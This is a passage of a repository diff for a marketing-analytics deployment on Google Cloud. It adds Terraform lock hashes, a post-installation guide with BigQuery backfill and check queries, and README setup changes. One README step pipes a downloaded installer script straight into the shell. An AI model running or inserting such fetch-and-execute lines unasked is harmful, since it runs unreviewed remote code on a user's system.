"h1:f6jXn4MCv67kgcofx9D49qx1ZEBv8oyvwKDMPBr0A24=", + "zh:04ceb65210251339f07cd4611885d242cd4d0c7306e86dda9785396807c00451", + "zh:448f56199f3e99ff75d5c0afacae867ee795e4dfda6cb5f8e3b2a72ec3583dd8", + "zh:4b4c11ccfba7319e901df2dac836b1ae8f12185e37249e8d870ee10bb87a13fe", + "zh:4fa45c44c0de582c2edb8a2e054f55124520c16a39b2dfc0355929063b6395b1", + "zh:588508280501a06259e023b0695f6a18149a3816d259655c424d068982cbdd36", + "zh:737c4d99a87d2a4d1ac0a54a73d2cb62974ccb2edbd234f333abd079a32ebc9e", "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:9647e18f221380a85f2f0ab387c68fdafd58af6193a932417299cdcae4710150", - "zh:bb6297ce412c3c2fa9fec726114e5e0508dd2638cad6a0cb433194930c97a544", - "zh:f83e925ed73ff8a5ef6e3608ad9225baa5376446349572c2449c0c0b3cf184b7", - "zh:fbef0781cb64de76b1df1ca11078aecba7800d82fd4a956302734999cfd9a4af", + "zh:a357ab512e5ebc6d1fda1382503109766e21bbfdfaa9ccda43d313c122069b30", + "zh:c51bfb15e7d52cc1a2eaec2a903ac2aff15d162c172b1b4c17675190e8147615", + "zh:e0951ee6fa9df90433728b96381fb867e3db98f66f735e0c3e24f8f16903f0ad", + "zh:e3cdcb4e73740621dabd82ee6a37d6cfce7fee2a03d8074df65086760f5cf556", + "zh:eff58323099f1bd9a0bec7cb04f717e7f1b2774c7d612bf7581797e1622613a0", ] } @@ -161,3 +181,23 @@ provider "registry.terraform.io/hashicorp/template" { "zh:c979425ddb256511137ecd093e23283234da0154b7fa8b21c2687182d9aea8b2", ] } + +provider "registry.terraform.io/hashicorp/time" { + version = "0.12.1" + hashes = [ + "h1:6BhxSYBJdBBKyuqatOGkuPKVenfx6UmLdiI13Pb3his=", + "h1:j+ED7j0ZFJ4EDx7sdna76wsiIf397toylDN0dFi6v0U=", + "zh:090023137df8effe8804e81c65f636dadf8f9d35b79c3afff282d39367ba44b2", + "zh:26f1e458358ba55f6558613f1427dcfa6ae2be5119b722d0b3adb27cd001efea", + "zh:272ccc73a03384b72b964918c7afeb22c2e6be22460d92b150aaf28f29a7d511", + "zh:438b8c74f5ed62fe921bd1078abe628a6675e44912933100ea4fa26863e340e9", + "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", + "zh:85c8bd8eefc4afc33445de2ee7fbf33a7807bc34eb3734b8eefa4e98e4cddf38", + "zh:98bbe309c9ff5b2352de6a047e0ec6c7e3764b4ed3dfd370839c4be2fbfff869", + "zh:9c7bf8c56da1b124e0e2f3210a1915e778bab2be924481af684695b52672891e", + "zh:d2200f7f6ab8ecb8373cda796b864ad4867f5c255cff9d3b032f666e4c78f625", + "zh:d8c7926feaddfdc08d5ebb41b03445166df8c125417b28d64712dccd9feef136", + "zh:e2412a192fc340c61b373d6c20c9d805d7d3dee6c720c34db23c2a8ff0abd71b", + "zh:e6ac6bba391afe728a099df344dbd6481425b06d61697522017b8f7a59957d44", + ] +} diff --git a/infrastructure/terraform/POST-INSTALLATION.md b/infrastructure/terraform/POST-INSTALLATION.md new file mode 100644 index 00000000..a4445fb3 --- /dev/null +++ b/infrastructure/terraform/POST-INSTALLATION.md @@ -0,0 +1,196 @@ + +## Post-Installation Guide + +Now that you have deployed all assets successfully in your Google Cloud Project, you may want to plan for operating the solution to be able to generate the predictions you need to create the audience segments you want for you Ads campaigns. To accomplish that, you gonna to plan a few things. + +First, you need to choose what kind of insight you are looking for to define the campaigns. 
Here are a few insights provided by each of the use cases that ship with the solution:
+
+- **Aggregated Value Based Bidding ([value_based_bidding](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L514))**: Attributes a numerical value to high value conversion events (user actions) in relation to a target conversion event (typically purchase) so that Google Ads can improve the bidding strategy for users that reached these conversion events, as of now.
+- **Demographic Audience Segmentation ([audience_segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L929))**: Attributes a cluster segment to a user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back.
+- **Interest based Audience Segmentation ([auto_audience_segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1018))**: Attributes a cluster segment to a user using page navigation data looking XX days back, as of now.
+- **Purchase Propensity ([purchase_propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L629))**: Predicts a purchase propensity decile and a propensity score (likelihood between 0.0 - 0% and 1.0 - 100%) for a user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back to predict XX days ahead, as of now.
+- **Customer Lifetime Value ([customer_ltv](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1215))**: Predicts a lifetime value gain decile and a lifetime value revenue gain in USD (equal to or greater than 0.0) for a user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX-XXX days back to predict XX days ahead, as of now.
+- **Churn Propensity ([churn_propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L779))**: Predicts a churn propensity decile and a propensity score (likelihood between 0.0 - 0% and 1.0 - 100%) for a user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back to predict XX days ahead, as of now.
+
+Second, you need to measure how much data you are going to use to obtain the insights you need. Each of the use cases above requires data in the following intervals, using the number of days and unique user events as key metrics. A sketch of how you might check these volumes in your GA4 export is shown right after this list.
+
+- **Aggregated Value Based Bidding ([value_based_bidding](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1734))**: Minimum 30 days and maximum 1 year. The number of unique user events is not a key limitation. Note that you need at least 1000 training examples for the model to be trained successfully; to accomplish that, the rows are typically duplicated until there is a minimum of 1000 rows in the "TRAIN" subset of the training table.
+- **Demographic Audience Segmentation ([audience_segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1779))**: Minimum 30 days and maximum 1 year. Minimum of 1000 unique user events per day. Note that you don't need more than 1M training examples for the model to perform well; make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (e.g. WHERE and LIMIT clauses).
+- **Interest based Audience Segmentation ([auto_audience_segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1817))**: Minimum 30 days and maximum 1 year. Minimum of 1000 unique user events per day. Note that you don't need more than 1M training examples for the model to perform well; make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (e.g. WHERE and LIMIT clauses).
+- **Purchase Propensity ([purchase_propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1739))**: Minimum 90 days and maximum 2 years. Minimum of 1000 unique user events per day, of which a minimum of 1 target event per week. Note that you don't need more than 1M training examples for the model to perform well; make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (e.g. WHERE and LIMIT clauses).
+- **Customer Lifetime Value ([customer_lifetime_value](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1798))**: Minimum 180 days and maximum 5 years. Minimum of 1000 unique user events per day, of which a minimum of 1 event per week that increases the lifetime value for a user. Note that you don't need more than 1M training examples for the model to perform well; make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (e.g. WHERE and LIMIT clauses).
+- **Churn Propensity ([churn_propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1758))**: Minimum 30 days and maximum 2 years. Minimum of 1000 unique user events per day, of which a minimum of 1 target event per week. Note that you don't need more than 1M training examples for the model to perform well; make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (e.g. WHERE and LIMIT clauses).
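+
+To size your data against these thresholds, you can count the days of data and the daily unique users and events available in your GA4 export before enabling a use case. The query below is an illustrative sketch only: it assumes the standard GA4 BigQuery export layout (`events_*` sharded tables with `event_date`, `event_name` and `user_pseudo_id` columns) and reuses the `MAJ_GA4_EXPORT_PROJECT_ID` and `MAJ_GA4_EXPORT_DATASET` variables from the installation guide; substitute your own project and dataset if those variables are not exported in your shell.
+
+```bash
+# Illustrative data volume check against the GA4 BigQuery export (adjust project/dataset as needed).
+bq query --use_legacy_sql=false "
+  SELECT
+    COUNT(DISTINCT event_date)                   AS days_of_data,
+    COUNT(DISTINCT user_pseudo_id)               AS unique_users,
+    COUNT(*)                                     AS total_events,
+    ROUND(COUNT(*) / COUNT(DISTINCT event_date)) AS avg_events_per_day
+  FROM \`${MAJ_GA4_EXPORT_PROJECT_ID}.${MAJ_GA4_EXPORT_DATASET}.events_*\`"
+```
+
+Compare `days_of_data` and `avg_events_per_day` with the minimums listed above before scheduling the corresponding pipelines.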
+
+Third, the data must be processed by the Marketing Data Store; features must be prepared using the Feature Engineering procedure; and the training and inference pipelines must be triggered. For that, open your `config.yaml.tftpl` configuration file and check the `{pipeline-name}.execution.schedule` block to modify the scheduled time for each pipeline you need to orchestrate to enable your use case. Here is a table of the pipeline configurations you need to enable for each use case.
+
+| Use Case | Pipeline Configuration |
+| -------- | ---------------------- |
+| **Aggregated Value Based Bidding** | [feature-creation-aggregated-value-based-bidding](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L473)
[value_based_bidding.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L515)
[value_based_bidding.explanation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L591) | +| **Demographic Audience Segmentation** | [feature-creation-audience-segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L248)
[segmentation.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L930)
[segmentation.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L973) | +| **Interest based Audience Segmentation** | [feature-creation-auto-audience-segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L170)
[auto_segmentation.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1019)
[auto_segmentation.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1061) | +| **Purchase Propensity** | [feature-creation-purchase-propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L315)
[purchase_propensity.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L630)
[purchase_propensity.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L725) | +| **Customer Lifetime Value** | [feature-creation-customer-ltv](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L419)
[propensity_clv.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1110)
[clv.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1221)
[clv.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1309) | +| **Churn Propensity** | [feature-creation-churn-propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L370)
[churn_propensity.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L780)
[churn_propensity.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L875) | + +After you change these configurations, make sure you apply these changes in your deployed resources by re-running terraform. + +```bash +terraform -chdir="${TERRAFORM_RUN_DIR}" apply +``` + +You can trigger your Cloud Workflow to execute your Dataform workflow at any time, or you can wait until the next day when the Cloud Workflow is going to be executed according to your schedule. There are two components in this solution that requires data for proper installation and functioning. One is the Looker Studio Dashboard, you only deploy the dashboard after you have executed all the steps in this Guide successfully. Another is the ML pipeline, the pipelines compilation requires views and tables to be created so that it can read their schema and define the column transformations to run during the pipeline execution. + +To manually start the data flow you must perform the following tasks: + +1. Run the Cloud Workflow + + On the Google Cloud console, navigate to Workflows page. You will see a Workflow named `dataform-prod-incremental`, then under Actions, click on the three dots and `Execute` the Workflow. + + **Note:** If you have a considerable amount of data (>XXX GBs of data) in your exported GA4 and Ads BigQuery datasets, it can take several minutes or hours to process all the data. Make sure that the processing has completed successfully before you continue to the next step. + +1. Invoke the BigQuery stored procedures having the prefix `invoke_backfill_*` to backfill the feature store in case the GA4 Export has been enabled before installing Marketing Analytics Jumpstart. + + On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. + ```sql + ## There is no need to backfill the aggregated value based bidding features since there + ## is no aggregations performed before training. The transformation was applied in the + ## Marketing Data Store + + ## Backfill customer ltv tables + CALL `feature_store.invoke_backfill_customer_lifetime_value_label`(); + CALL `feature_store.invoke_backfill_user_lifetime_dimensions`(); + CALL `feature_store.invoke_backfill_user_rolling_window_lifetime_metrics`(); + + ## Backfill purchase propensity tables + CALL `feature_store.invoke_backfill_user_dimensions`(); + CALL `feature_store.invoke_backfill_user_rolling_window_metrics`(); + CALL `feature_store.invoke_backfill_purchase_propensity_label`(); + + ## Backfill audience segmentation tables + CALL `feature_store.invoke_backfill_user_segmentation_dimensions`(); + CALL `feature_store.invoke_backfill_user_lookback_metrics`(); + + ## There is no need to backfill the auto audience segmentation features since + ## they are dynamically prepared in the feature engineering pipeline using + ## python code + + ## Backfill churn propensity tables + ## This use case reuses the user_dimensions and user_rolling_window_metrics, + ## make sure you invoke the backfill for these tables. 
CALLs are listed above + ## under backfill purchase propensity + CALL `feature_store.invoke_backfill_churn_propensity_label`(); + + ## Backfill for gemini insights + CALL `feature_store.invoke_backfill_user_scoped_metrics`(); + CALL `gemini_insights.invoke_backfill_user_behaviour_revenue_insights`(); + ``` + + **Note:** If you have a considerable amount of data (>XXX GBs of data) in your exported GA4 BigQuery datasets over the last six months, it can take several hours to backfill the feature data so that you can train your ML model. Make sure that the backfill procedures starts without errors before you continue to the next step. + +1. Check whether the feature store tables you have run backfill have rows in it. + + On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. + ```sql + ## There are no tables used by the aggregated value based bidding use case + ## in the feature store. + + ## Checking customer ltv tables are not empty + SELECT COUNT(user_pseudo_id) FROM `feature_store.customer_lifetime_value_label`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_lifetime_dimensions`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_lifetime_metrics`; + + ## Checking purchase propensity tables are not empty + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_dimensions`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_metrics`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.purchase_propensity_label`; + + ## Checking audience segmentation tables are not empty + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_segmentation_dimensions`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_lookback_metrics`; + + ## There are no tables used by the auto audience segmentation use case + ## in the feature store. + + ## Checking churn propensity tables are not empty + ## This use case reuses the user_dimensions and user_rolling_window_metrics, + ## make sure you invoke the backfill for these tables. CALLs are listed above + ## under the instructions for backfill purchase propensity + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_dimensions`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_metrics`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.churn_propensity_label`; + + ## Checking gemini insights tables are not empty + SELECT COUNT(feature_date) FROM `feature_store.user_scoped_metrics`; + SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_daily`; + SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_weekly`; + SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_monthly`; + ``` + +1. Redeploy the ML pipelines using Terraform. + + On your code editor, change the variable `deploy_pipelines` from `true` to `false`, on the TF variables file `${TERRAFORM_RUN_DIR}/terraform.tfvars`. + Next, undeploy the ML pipelines component by applying the terraform configuration. + + ```bash + terraform -chdir="${TERRAFORM_RUN_DIR}" apply + ``` + + Now, to deploy the ML pipelines component again, revert your changes on the TF variables file `${TERRAFORM_RUN_DIR}/terraform.tfvars` and apply the terraform configuration by running the commad above again. + + **Note:** The training pipelines use schemas defined by a `custom_transformations` parameter in your `config.yaml` or by the training table/view schema itself. 
+ So at first, during the first deployment i.e. `tf apply`, because the views are not created yet, we assume a fixed schema in case no `custom_transformations` parameter is provided. + Then, you need to redeploy to make sure that since all the table views exist now, redeploy the pipelines to make sure you fetch the right schema to be provided to the training pipelines. + +1. Once the feature store is populated and the pipelines are redeployed, manually invoke the BigQuery procedures for preparing the training datasets, which have the suffix `_training_preparation`. + + On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. + ```sql + ## Training preparation for Aggregated Value Based Bidding + CALL `aggregated_vbb.invoke_aggregated_value_based_bidding_training_preparation`(); + + ## Training preparation for Customer Lifetime Value + CALL `customer_lifetime_value.invoke_customer_lifetime_value_training_preparation`(); + + ## Training preparation for Purchase Propensity + CALL `purchase_propensity.invoke_purchase_propensity_training_preparation`(); + + ## Training preparation for Audience Segmentation + CALL `audience_segmentation.invoke_audience_segmentation_training_preparation`(); + + ## Training preparation for Auto Audience Segmentation + CALL `auto_audience_segmentation.invoke_auto_audience_segmentation_training_preparation`(); + + ## Training preparation for Churn Propensity + CALL `churn_propensity.invoke_churn_propensity_training_preparation`(); + + ## There is no need to prepare training data for the gemini insights use case. + ## Gemini insights only require feature engineering the inference pipelines. + ## The gemini insights are saved in the gemini insights dataset, specified in the `config.yaml.tftpl` file. + ``` + +1. Check whether the training preparation tables you have run the procedures above have rows in it. + + On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. + ```sql + ## Checking aggregated value based bidding tables are not empty. + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT * FROM `aggregated_vbb.aggregated_value_based_bidding_training_full_dataset`; + + ## Checking customer ltv tables are not empty + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT COUNT(user_pseudo_id) FROM `customer_lifetime_value.customer_lifetime_value_training_full_dataset`; + + ## Checking purchase propensity tables are not empty + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT COUNT(user_pseudo_id) FROM `purchase_propensity.purchase_propensity_training_full_dataset`; + + ## Checking audience segmentation tables are not empty + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT COUNT(user_pseudo_id) FROM `audience_segmentation.audience_segmentation_training_full_dataset`; + + ## Checking churn propensity tables are not empty + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT COUNT(user_pseudo_id) FROM `churn_propensity.churn_propensity_training_full_dataset`; + ``` + +Your Marketing Analytics Jumpstart solution is ready for daily operation. 
Plan for the days you want your model(s) to be trained, change the scheduler dates in the `config.yaml.tftpl` file or manually trigger training whenever you want. For more information, read the documentations in the [docs/ folder](../../docs/). diff --git a/infrastructure/terraform/README.md b/infrastructure/terraform/README.md index 793f9419..fcbb9246 100644 --- a/infrastructure/terraform/README.md +++ b/infrastructure/terraform/README.md @@ -1,11 +1,13 @@ -# Terraform Scripts +# Manual Installation of Terraform Modules -The Terraform scripts in this folder create the infrastructure to start data ingestion -into BigQuery, create feature store, ML pipelines and Dataflow activation pipeline. +The Terraform scripts in this folder and subfolders create the infrastructure to start data ingestion +into BigQuery, create feature store, run ML pipelines and Dataflow activation application. ## Prerequisites -Make sure the prerequisites listed in the [parent README](../README.md) are met. You can run the script +Make sure the prerequisites listed in the [parent README](../README.md) are met. + +You can run the script from [Cloud Shell](https://cloud.google.com/shell/docs/using-cloud-shelld.google.com/shell/docs/using-cloud-shell) or a Linux machine or a Mac with `gcloud` command installed. The instructions provided are for the Cloud Shell installation. @@ -16,10 +18,11 @@ have plenty of disk space before continuing the installation. If that is not your case, following the Cloud Shell documentation to [reset your Cloud Shell](https://cloud.google.com/shell/docs/resetting-cloud-shell). -## Installation Guide -Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.svg)](https://shell.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart.git&cloudshell_git_branch=main&cloudshell_workspace=&cloudshell_tutorial=infrastructure/cloudshell/tutorial.md) +## Manual Installation Guide + +In this section, you find all the detailed steps required for you to manually install the Marketing Analytics Jumpstart solution. Following this process, you have greater flexibility and customization allowing you to choose which components of the solution you want to use or not. -**Note:** If you are working from a forked repository, be sure to update the `cloudshell_git_repo` parameter to the URL of your forked repository for the button link above. +Also, this method allows you to extend this solution and develop it to satisfy your own needs. ### Initial Environment Setup @@ -40,51 +43,18 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com gcloud config set project $PROJECT_ID ``` -1. Install or update Python3 - Install a compatible version of Python 3.8-3.10 and set the CLOUDSDK_PYTHON environment variable to point to it. +1. Install update uv for running python scripts + Install [uv](https://docs.astral.sh/uv/) that manages the python version and dependecies for the solution. - ```bash - sudo apt-get install python3.10 - CLOUDSDK_PYTHON=python3.10 + ```sh + curl -LsSf https://astral.sh/uv/install.sh | sh + export PATH="$HOME/.local/bin:$PATH" ``` - If you are installing on a Mac: - ```shell - brew install python@3.10 - CLOUDSDK_PYTHON=python3.10 - ``` -1. Install Python's Poetry and set Poetry to use Python3.8-3.10 version - - [Poetry](https://python-poetry.org/docs/) is a Python's tool for dependency management and packaging. 
- - If you are installing on in Cloud Shell use the following commands: - ```shell - pipx install poetry - ``` - If you don't have pipx installed - follow the [Pipx installation guide](https://pipx.pypa.io/stable/installation/) - ```shell - sudo apt update - sudo apt install pipx - pipx ensurepath - ``` - Verify that `poetry` is on your $PATH variable: - ```shell - poetry --version - ``` - If it fails - add it to your $PATH variable: - ```shell - export PATH="$HOME/.local/bin:$PATH" - ``` - If you are installing on a Mac: - ```shell - brew install poetry - ``` - Set poetry to use your latest python3 - ```shell - SOURCE_ROOT=${HOME}/${REPO} - cd ${SOURCE_ROOT} - poetry env use python3 - ``` + Check uv installation: + ```sh + uv --version + ``` 1. Authenticate with additional OAuth 2.0 scopes needed to use the Google Analytics Admin API: ```shell @@ -102,7 +72,7 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com 1. Review your Terraform version - Make sure you have installed terraform version is 1.5.7. We recommend you to use [tfenv](https://github.com/tfutils/tfenv) to manage your terraform version. + Make sure you have installed terraform version is 1.9.7. We recommend you to use [tfenv](https://github.com/tfutils/tfenv) to manage your terraform version. `Tfenv` is a version manager inspired by rbenv, a Ruby programming language version manager. To install `tfenv`, run the following commands: @@ -112,14 +82,22 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com # Follow instructions on https://github.com/tfutils/tfenv # Now, install the recommended terraform version - tfenv install 1.5.7 - tfenv use 1.5.7 + tfenv install 1.9.7 + tfenv use 1.9.7 terraform --version ``` + **Note:** If you have a Apple Silicon Macbook, you should install terraform by setting the `TFENV_ARCH` environment variable: + ```shell + TFENV_ARCH=amd64 tfenv install 1.9.7 + tfenv use 1.9.7 + terraform --version + ``` + If not properly terraform version for your architecture is installed, `terraform .. init` will fail. + For instance, the output on MacOS should be like: ```shell - Terraform v1.5.7 + Terraform v1.9.7 on darwin_amd64 ``` @@ -128,6 +106,7 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com Terraform stores state about managed infrastructure to map real-world resources to the configuration, keep track of metadata, and improve performance. Terraform stores this state in a local file by default, but you can also use a Terraform remote backend to store state remotely. [Remote state](https://developer.hashicorp.com/terraform/cdktf/concepts/remote-backends) makes it easier for teams to work together because all members have access to the latest state data in the remote store. ```bash + SOURCE_ROOT="${HOME}/${REPO}" cd ${SOURCE_ROOT} scripts/generate-tf-backend.sh ``` @@ -158,14 +137,23 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com or in multi-regions by assigning value such as * `US` or `EU` -1. Run Terraform to create resources: +1. Run Terraform to initialize your environment, and validate if your configurations and variables are set as expected: ```bash terraform -chdir="${TERRAFORM_RUN_DIR}" init - terraform -chdir="${TERRAFORM_RUN_DIR}" apply + terraform -chdir="${TERRAFORM_RUN_DIR}" plan + terraform -chdir="${TERRAFORM_RUN_DIR}" validate ``` - If you don't have a successful execution from the beginning, re-run until all is deployed successfully. 
+ If you run into errors, review and edit the `${TERRAFORM_RUN_DIR}/terraform.tfvars` file. However, if there are still configuration errors, open a new [github issue](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/issues/). + +1. Run Terraform to create resources: + + ```bash + terraform -chdir="${TERRAFORM_RUN_DIR}" apply + ``` + + If you don't have a successful execution of certain resources, re-run `terraform -chdir="${TERRAFORM_RUN_DIR}" apply` a few more times until all is deployed successfully. However, if there are still resources not deployed, open a new [github issue](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/issues/). ### Resume terminal session @@ -175,10 +163,10 @@ Because a Cloud Shell session is ephemeral, your Cloud Shell session could termi Reset your Google Cloud Project ID variables: - ```shell - export PROJECT_ID="[your Google Cloud project id]" - gcloud config set project $PROJECT_ID - ``` + ```bash + export PROJECT_ID="[your Google Cloud project id]" + gcloud config set project $PROJECT_ID + ``` Follow the authentication workflow, since your credentials expires daily: @@ -213,198 +201,12 @@ At this time, the Terraform scripts in this folder perform the following tasks: - Dataform repository connected to the GitHub repo - Deploys the marketing data store (MDS), feature store, ML pipelines and activation application -The Looker Studio Dashboard deployment is a separate [step](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/python/lookerstudio/README.md). +## Next Steps -## Post-Installation Instructions +Follow the [post-installation guide](./POST-INSTALLATION.md) to start you daily operations. -Now that you have deployed all assets successfully in your Google Cloud Project, you may want to plan for operating the solution to be able to generate the predictions you need to create the audience segments you want for you Ads campaigns. To accomplish that, you gonna to plan a few things. +It is recommended to follow the post-installation guide before deploying the Looker Studio Dashboard, because you need the data and predictions tables to exist before consuming insights in your reports. -First, you need to choose what kind of insight you are looking for to define the campaigns. Here are a few insights provided by each one of the use cases already provided to you: +**The Looker Studio Dashboard deployment is a separate [step](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/python/lookerstudio/README.md).** -- **Aggregated Value Based Bidding**: Attributes a numerical value to high value conversion events (user action) in relation to a target conversion event (typically purchase) so that Google Ads can improve the bidding strategy for users that reached these conversion events, as of now. -- **Demographic Audience Segmentation**: Attributes a cluster segment to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back. -- **Interest based Audience Segmentation**: Attributes a cluster segment to an user using pages navigations data looking XX days back, as of now. -- **Purchase Propensity**: Predicts a purchase propensity decile and a propensity score (likelihood between 0.0 - 0% and 1.0 - 100%) to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back to predict XX days ahead, as of now. 
-- **Customer Lifetime Value**: Predicts a lifetime value gain decile and a lifetime value revenue gain in USD (equal of bigger than 0.0) to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX-XXX days back to predict XX days ahead, as of now. -- **Churn Propensity**: Predicts a churn propensity decile and a propensity score (likelihood between 0.0 - 0% and 1.0 - 100%) to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back to predict XX days ahead, as of now. - -Second, you need to measure how much data you are going to use to obtain the insights you need. Each one of the use cases above requires data in the following intervals, using as key metrics number of days and unique user events. - -- **Aggregated Value Based Bidding**: Minimum 30 days and maximum 1 year. The number of unique user events is not a key limitation. Note that you need at least 1000 training examples for the model to be trained successfully, to accomplish that we typically duplicate the rows until we have a minimum of 1000 rows in the training table for the "TRAIN" subset. -- **Demographic Audience Segmentation**: Minimum 30 days and maximum 1 year. Minimum of 1000 unique user events per day. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). -- **Interest based Audience Segmentation**: Minimum 30 days and maximum 1 year. Minimum of 1000 unique user events per day. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). -- **Purchase Propensity**: Minimum 90 days and maximum 2 years. Minimum of 1000 unique user events per day, of which a minimum of 1 target event per week. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). -- **Customer Lifetime Value**: Minimum 180 days and maximum 5 years. Minimum of 1000 unique user events per day, of which a minimum of 1 event per week that increases the lifetime value for an user. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). -- **Churn Propensity**: Minimum 30 days and maximum 2 years. Minimum of 1000 unique user events per day, of which a minimum of 1 target event per week. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). - -Third, the data must be processed by the Marketing Data Store; features must be prepared using the Feature Engineering procedure; and the training and inference pipelines must be triggered. For that, open your `config.yaml.tftpl` configuration file and check the 